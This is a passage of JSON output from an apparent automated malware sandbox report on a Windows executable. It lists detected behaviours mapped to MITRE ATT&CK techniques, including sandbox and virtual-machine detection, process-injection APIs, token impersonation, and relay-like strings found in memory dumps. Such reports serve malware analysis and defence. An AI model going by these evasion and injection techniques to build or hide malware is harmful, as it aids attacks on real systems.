\"\\FileSystem\\Filters\\FltMgrMsg\"\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to touch file \"\\Device\\Harddisk0\\DR0\"\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to touch file \"C:\\CRYPTBASE.dll\"\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to touch file \"C:\\Windows\\system32\\CRYPTBASE.dll\"\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to touch file \"\\Device\\KsecDD\"\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to touch file \"C:\\Windows\\System32\\wininet.dll\"\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to touch file \"C:\\version.DLL\"\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to touch file \"C:\\secur32.dll\"\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to touch file \"C:\\Windows\\system32\\secur32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" trying to access non-existent file \"\\Device\\RasAcd\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "summary-29", "type": 15, "relevance": 1, "name": "Shows ability to use execution guardrails", "description": "The analysis shows indicators which can be used as execution guardrails to ensure that payload only executes against intended targets/system. Matched sigs: Found a reference to an external IP address lookup service\n Matched sigs: Contains ability to retrieve the time elapsed since the system was started (API string)\n Matched sigs: Able to identify virtual environment by using API string\n Matched sigs: Contains ability to delay execution by waiting for signal/timeout (API string)\n Matched sigs: Able to identify sandbox environment running process\n Matched sigs: Contains ability to detect virtual environment (API)\n Matched sigs: Tries to identify its external IP address", "origin": "Indicator Combinations", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-318", "type": 2, "relevance": 1, "name": "Contains ability to load/free library (API string)", "description": "Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; File: \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000000.296751.10000000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.00D92000.00000002.mdmp\")\n Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.00D92000.00000002.mdmp\")\n Found reference to API \"LoadLibraryW\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000000.296751.10000000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-588", "type": 2, "relevance": 3, "name": "Contains ability to attach base64 encoded attachment to an email", "description": "Found string \"Content-Transfer-Encoding: base64\" (Indicator: \"Content-Transfer-Encoding: base64\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1132.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "memorydump-8", "type": 20, "relevance": 1, "name": "Found PE header in memory", "description": "Found PE header \"MZ\" - Source: \"00000000-00001188.00000000.296751.00400000.00000040.mdmp\")\n Found PE header \"MZ\" - Source: \"00000000-00001188.00000000.296751.10000000.00000040.mdmp\")\n Found PE header \"MZ\" - Source: \"00000000-00001188.00000001.298674.00400000.00000040.mdmp\")\n Found PE header \"MZ\" - Source: \"00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "Memory Dumps", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-226", "type": 2, "relevance": 1, "name": "Contains ability to delay execution by waiting for signal/timeout (API string)", "description": "Found reference to API \"WaitForSingleObject\" (Indicator: \"WaitForSingleObject\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000000.296751.10000000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"WaitForMultipleObjects\" (Indicator: \"WaitForMultipleObjects\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000000.296751.10000000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"NtQuerySystemInformation\" (Indicator: \"NtQuerySystemInformation\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000000.296751.10000000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"QueryPerformanceCounter\" (Indicator: \"QueryPerformanceCounter\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"RegisterWaitForSingleObject\" (Indicator: \"WaitForSingleObject\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"QueryPerformanceFrequency\" (Indicator: \"QueryPerformanceFrequency\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-79", "type": 2, "relevance": 1, "name": "Contains ability to create a remote thread (API string)", "description": "Found reference to API \"RtlCreateUserThread\" (Indicator: \"RtlCreateUserThread\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"CreateRemoteThread\" (Indicator: \"CreateRemoteThread\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-439", "type": 2, "relevance": 1, "name": "Contains ability to modify process memory (API string)", "description": "Found reference to API \"VirtualAllocEx\" (Indicator: \"VirtualAllocEx\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-306", "type": 2, "relevance": 1, "name": "Contains ability to impersonate access tokens (API string)", "description": "Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcessToken\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-138", "type": 2, "relevance": 2, "name": "Contains ability to use Cryptographic classes", "description": "Found reference to \"CryptCNGInitHMAC\" (Indicator: \"HMAC\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp\")\n Found reference to \"r FlashShark I3Qz8kOHk+/HIYmgrIkjirpx2SQ WRC2QlMwrFZEerOOfAmX7pf5Pwo 2025-02-19 20:25:51 <IPv4> 11091 0\" (Indicator: \"RC2\"; Source: \"00000000-00001188.00000001.298674.00C30000.00000004.mdmp, 00000000-00001188.00000002.300597.00C30000.00000004.mdmp\")\n Found reference to \"r prsv D9znTtsEcVBDWlXIJrlw0Y7SAes Xe5Q9HquW6Itkp2eN3rZyeyf9KA 2025-02-19 23:31:17 <IPv4> 9000 0\" (Indicator: \"Aes\"; Source: \"00000000-00001188.00000001.298674.00C30000.00000004.mdmp, 00000000-00001188.00000002.300597.00C30000.00000004.mdmp\")\n Found reference to \"r Cloudlab1 fcQWuuuu5LAkHj/FRC2mkx3DHGI G2oKxJX4bBhhIEtnNtPcfgcfT/g 2025-02-20 00:12:36 <IPv4> 443 0\" (Indicator: \"RC2\"; Source: \"00000000-00001188.00000001.298674.03150000.00000004.mdmp, 00000000-00001188.00000002.300597.03150000.00000004.mdmp\")\n Found reference to \"r AestetiumRelay 4bgjlyWoiGuGYrcEfe3ZxrDYrkU cZhJIoaDIZTa4pbKD8cdJXdzvOg 2025-02-20 12:01:48 <IPv4> 443 0\" (Indicator: \"Aes\"; Source: \"00000000-00001188.00000001.298674.034B0000.00000004.mdmp\")\n Found reference to \"r xmission1 5BsW9931LrsdtCaKsv40CzetiQQ DGLKZaq7UJCCjw9fyAcvDAesrtc 2025-02-20 04:33:58 <IPv4> 9101 0\" (Indicator: \"Aes\"; Source: \"00000000-00001188.00000001.298674.034B0000.00000004.mdmp\")\n Found reference to \"r Quetzalcoatl 8NAesf3FCCeas0Eq8/yVC7HaKtE 0/Zgtw7sWGrQ9VRbdyrmzgOThhs 2025-02-20 05:52:05 <IPv4> 9100 0\" (Indicator: \"Aes\"; Source: \"00000000-00001188.00000001.298674.034B0000.00000004.mdmp\")\n Found reference to \"r AntonPann6 9q5sGY7xpuDx+d/vhYKhXvfqQrg j1MPXuaHzFc604lzBLRC22sAxJ4 2025-02-20 02:45:26 <IPv4> 443 0\" (Indicator: \"RC2\"; Source: \"00000000-00001188.00000001.298674.034B0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-338", "type": 2, "relevance": 1, "name": "Contains ability to perform Base64 encoding/decoding", "description": "Found string \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\" (Indicator: \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found string \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\" (Indicator: \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-404", "type": 2, "relevance": 1, "name": "Contains ability to compress/decompress buffers (API string)", "description": "Found reference to API \"RtlCompressBuffer\" (Indicator: \"RtlCompressBuffer\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"RtlComputeCrc32\" (Indicator: \"RtlComputeCrc32\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000000.296751.10000000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1560.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560/002"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-92", "type": 2, "relevance": 1, "name": "Contains ability to inject code into another process (API string)", "description": "Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000000.296751.10000000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"NtAllocateVirtualMemory\" (Indicator: \"AllocateVirtualMemory\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"NtWriteVirtualMemory\" (Indicator: \"WriteVirtualMemory\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"VirtualFreeEx\" (Indicator: \"VirtualFree\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"VirtualAllocEx\" (Indicator: \"VirtualAlloc\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"VirtualAllocEx\" (Indicator: \"VirtualAllocEx\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"WriteProcessMemory\" (Indicator: \"WriteProcessMemory\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000000.296751.10000000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"VirtualFree\" (Indicator: \"VirtualFree\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"VirtualAlloc\" (Indicator: \"VirtualAlloc\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000000.296751.10000000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "string-183", "type": 2, "relevance": 1, "name": "Contains ability to check debugger is running (API string)", "description": "Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; File: \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef\")", "origin": "File/Memory", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-171", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the OS information (API string)", "description": "Found reference to API \"RtlGetVersion\" (Indicator: \"GetVersion\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"GetVersionExW\" (Indicator: \"GetVersionExW\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"GetVersionExW\" (Indicator: \"GetVersion\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersionExA\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersion\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-312", "type": 2, "relevance": 1, "name": "Contains ability to retrieve path in which Windows is installed (API string)", "description": "Found reference to API \"GetWindowsDirectoryA\" (Indicator: \"GetWindowsDirectory\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-141", "type": 2, "relevance": 1, "name": "Contains ability to retrieve open application windows (API string)", "description": "Found reference to API \"GetWindowTextA\" (Indicator: \"GetWindowText\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"GetForegroundWindow\" (Indicator: \"GetForegroundWindow\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"FindWindowA\" (Indicator: \"FindWindow\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"EnumWindows\" (Indicator: \"EnumWindows\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-659", "type": 2, "relevance": 1, "name": "Able to identify virtual environment by using API string", "description": "Found string \"NtQuerySystemInformation\" (Indicator: \"NtQuerySystemInformation\"; Source: \"00000000-00001188-00000C29-3648678854\")\n Found string \"NtQuerySystemInformation\" (Indicator: \"NtQuerySystemInformation\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000000.296751.10000000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-247", "type": 2, "relevance": 1, "name": "Contains ability to retrieve machine time (API string)", "description": "Found reference to API \"GetLocalTime\" (Indicator: \"GetLocalTime\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"GetSystemTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-721", "type": 2, "relevance": 1, "name": "Able to visualize and control listed components (API string)", "description": "Found reference to API \"FindWindowA\" (Indicator: \"findwindow\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 